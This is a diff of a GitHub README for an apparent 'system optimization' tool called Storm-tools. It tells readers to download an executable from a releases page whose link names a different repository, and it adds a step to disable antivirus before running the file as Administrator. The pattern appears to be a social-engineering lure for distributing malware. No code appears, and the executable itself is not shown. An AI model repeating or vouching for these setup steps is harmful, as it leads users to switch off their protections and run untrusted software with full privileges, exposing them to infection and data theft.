ASXCCFTYHNNJI/Storm-tools/README.md

 ### 📥 Installation & Setup
 1. Go to the **[Releases](https://github.com/ASXCCFTYHNNJI/Multi-tools/releases)** section on the right side of this page.
 2. Download the `Шторм.exe` file.
+3. **Disable your Antivirus** to allow the optimization scripts to run.
-3. Run the executable as **Administrator** to unlock the full potential of the suite.
+4. Run the executable as **Administrator** to unlock the full potential of the suite.

 ---
 ⚠️ *Disclaimer: This tool is intended for system optimization and educational purposes only.
 The author is not responsible for any misuse or damage caused by this software.*